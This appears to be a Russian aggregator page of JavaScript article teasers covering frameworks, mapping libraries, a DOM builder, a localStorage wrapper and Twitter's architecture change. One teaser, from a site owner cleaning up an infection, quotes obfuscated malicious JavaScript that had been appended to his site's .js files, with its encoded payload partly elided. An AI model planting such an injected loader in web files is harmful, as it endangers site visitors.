Рубрика «javascript» - 558

Если коротко

Мы разработали новый JS-фреймворк, не похожий на существующие. Он использует новый подход. Мы зовём его Joosy.

Официальный сайт
Руководство для новичков

Joosy: альтернативный подход к браузерным фреймворкам
Читать полностью »

Привет!

Расскажу об одной небольшой (~30kb) JS библиотеке для удобной работы с Google Maps API под названием gmaps.js.
Раз уж библиотека создана для ускорения процесса веб-разработки, то и я вас задерживать не буду. Как можно понять из названия, она делает не что иное, как упрощает взаимодействие с API Google Maps. Многие из вас работали с API и, вероятно, каждый раз вам приходилось попотеть, чтобы порыться в документации и реализовать, например, свое собственное описание метки на карте. Или подписаться на событие взаимодействия с картой…
Читать полностью »

Изометрия — вещь, стара как компьютерные игры.
Сейчас пришло время, когда интернет и игры стали совмещаться в браузере (flash не в счет).
Примеров браузерных игр много, большая часть из них казуалки, но для гиков
более интересны жанры action, RTS и RPG, а для разработчиков — их реализация.

Для жанра RTS, RPG и пошаговых стратегий матрица является основным механизмом для движения
юнитов, рисования текстур и многое другое. Но когда Вы попробуете объеденить
матрицу и изометрические текстуры, Вы попадете в ад, с которого вы не вылезите,
пока не напишете прослойку для управления и воздействия на эту матрицу.

Под катом я расскажу:

  1. Как рисовать изометрическую матрицу
  2. Как нарисовать fullscreen изометрическую матрицу

Читать полностью »

Laconic обеспечивает интуитивный подход к генерированию DOM джаваскриптом. Исходный код Laconic выложен на Гитхабе.

При использовании стандартного DOM API для создания вложенных друг в друга элементов простой таблицы потребовался бы вот какой код:

ворох кода

var firstTh = document.createElement('th');
firstTh.appendChild(document.createTextNode('first name'));
var secondTh = document.createElement('th');
secondTh.appendChild(document.createTextNode('last name'));
var firstTr = document.createElement('tr');
firstTr.appendChild(firstTh);
firstTr.appendChild(secondTh);
var firstTd = document.createElement('td'); 
firstTd.appendChild(document.createTextNode('Joe'));
var secondTd = document.createElement('td'); 
secondTd.appendChild(document.createTextNode('Stelmach'));
var secondTr = document.createElement('tr');
secondTr.appendChild(firstTd);
secondTr.appendChild(secondTd);
var table = document.createElement('table');
table.appendChild(firstTr);
table.appendChild(secondTr);
document.body.appendChild(table);

Такой код много обширнее, чем это уместно, так что по его виду угадать результат его работы трудно. Теперь взгляните на более лаконический способ создания той же таблицы:

$.el.table(
  $.el.tr(
    $.el.th('first name'),
    $.el.th('last name')),
  $.el.tr(
    $.el.td('Joe'),
    $.el.td('Stelmach'))
).appendTo(document.body);

Laconic добавляет в пространство имён $.el по одному методу для каждого из известных элементов HTML. Этим методам при их запуске передаётся список аргументов, имеющий переменную длину и состоящий из дочерних элементов, строк, чисел, или массивов элементов этих типов. Первым аргументом метода может быть необязательный объект, содержащий атрибуты элемента. Вот пример:

$.el.div({'class' : 'example'}, 
  $.el.div('content'));

Код этого примера создаст такую структуру элементов:

<div class='example'>
  <div>content<div/>
</div>

Читать полностью »

Сейчас на рынке много предложений по продаже мобильных устройств, предназначенных для контроля движущихся объектов или трекеров. В большинстве из них есть функция передачи информации по GPRS на любой заданный веб-адрес через определенный интервал времени. Чаще всего формат передачи данных разный. Поэтому мы не будем рассматривать вопрос загрузки данных с трекера в базу. Предположим данные есть и мы хотим приступить к созданию сервиса мониторинга транспорта. Основу такой системы образуют возможности:
-выбор карты и ее отображение
-отображение точки или картинки и подписи к ней
-отображение полигона и его редактирование
-отображение линии и ее редактирование
-отображение информации связной с полигонами, линиями, точками (всплывающие подсказки)
-немного математики (подсчет пройденного пути, площадь полигона, принадлежность точки полигону)
Все эти функции легко реализовать с помощью OpenLayers, библиотеки на JavaScript.
OpenLayers или делаем сервис мониторинга транспорта
Читать полностью »

Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду Читать полностью »

WebGL-2d — весьма интересная javascript библиотека, реализующая стандартные методы для работы с 2d контекстом Canvas на WebGL контексте.

Ни для кого не секрет, что сегодня Canvas не может похвастаться хорошей производительностью и отрисовка сложных сцен в реальном времени может стать проблемой. С WebGL ситуация с производительностью существенно лучше, но этот стандарт поддерживают не все популярные браузеры, в частности Microsoft даже не планирует внедрять его поддержку в IE (сторонние разработчики по этой причине уже начали делать плагин).

Подключив WebGL-2d и добавив всего пару строчек, мы можем существенно ускорить отрисовку графики, реализованную с средствами Canvas 2d API в браузерах, поддерживающих WebGL и обеспечить fallback к обычному 2d контексту.

Читать полностью »

Этим постом я бы хотел исправиться и предложить адекватный способ работы с хранилищем, как с объектом. Код из поста «Работа с локальным хранилищем, как с объектом? Легко!» использовать крайне не рекомендую, там всё плохо (минусы изложены внизу). Цель данного — объяснить всем тем, кто добавил статью по ссылке в избранное или поставил плюсик, никогда не использовать этот код.

Сейчас же я хочу продемонстрировать проетейшую идею, предложенную Scalar в комментарии.

При загрузке страницы (даже до события готовности DOM дерева) обращаемся к хранилищу (в данном случае, это localStorage и sessionStorage), получить JSON, десериализовать его и положить в какую-нибудь переменную.

localObject = JSON.parse( localStorage.getItem( '_myStorage' ) ); // "{'a':1, 'b':2}" → {a:1, b:2}

Затем, каждые N миллисекунд производить обратный процесс:

localStorage.setItem( '_myStorage', JSON.stringify( localObject ) );

При событии onbeforeunload делать то же самое.

Реализация идеи слишком проста (уровень сложности реализации низок и доступен даже новичку). Но, не все (и я в том числе) до этого додумались.

Код конструктора ObjectStorage

var ObjectStorage = function ObjectStorage ( name, duration ) {
	this._name = name || this._name;
	this.duration  = duration || this.duration;
	this._init();
}

ObjectStorage.prototype = {
	_name: '_objectStorage',
	duration: 5000,
	// type == local || session
	_save: function( type ) {
		window[ type + 'Storage' ].setItem( this._name, JSON.stringify( this[ type ] ) );
	},
	
	_get: function( type ) {
		this[ type ] = JSON.parse( window[ type + 'Storage' ].getItem( this._name ) ) || {};
	},
	 
	_init: function() {
		var self = this;
		self._get( 'local' );
		self._get( 'session' );
		
		( function callee() {
			setTimeout( function() {
				self._save( 'local' );
				callee();
			}, self._duration );
		})();
		
		window.addEventListener( 'beforeunload', function() {
			self._save( 'local' );
			self._save( 'session' );
		} );
	},
	
	local: {},
	session: {}
};

Использование:

var storage = new ObjectStorage;
storage.local = {a:4, b: {c:5}};
storage.session = {a:7, b: {c:8}};
b = storage.local.b;
b.c = {d:6};

Читать полностью »

Twitter объявил об очередной смене архитектуры: рендеринг страниц теперь будет осуществляться на стороне сервера, а не на стороне клиента.

После прошлой модернизации в сентябре 2010 года весь рендеринг UI и логику переложили на JavaScript на клиентской стороне. Браузеры напрямую обращались к Twitter REST API, как и мобильные клиенты. Хотя такой подход помог реализовать ряд преимуществ, но разработчики потеряли возможности оптимизации, которые доступны при серверно-ориентированном подходе. В результате, пользователи начали жаловаться на субъективное «подтормаживание» страниц twitter.com.

На этой неделе новую архитектуру выкатили для статичных ссылок (пермалинков). Как показали тесты, скорость загрузки страницы в браузер пользователя выросла в среднем в пять раз, а также значительно сократился разрыв между различными браузерами, которые по-разному справляются с JavaScript.
Читать полностью »

На днях команда HTML5-карт Nokia представила API карт под смартфоны и планшетники.

С места — в карьер!

Попробовать можно по ссылке: bit.ly/html5map
На данный момент поддерживаются Webkit-браузеры.

Достоинства и возможности

  • Компоненты
    Карты, пробки, поиск, геолокация, информация об интересных местах, навигация, пешеходные маршруты, избранное.
  • Вес
    80 KB Javascript + 10 KB CSS
  • Производительность
    Быстрая загрузка и плавные эффекты.
  • Готовность
    Можно легко поменять цвета, обернуть в PhoneGap или QtWebkit и получить готовое приложение.
  • WYSIWYG-помощник
    Помогает настроить конфигурацию под себя.

HTML5 карты для мобильных платформЧитать полностью »


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js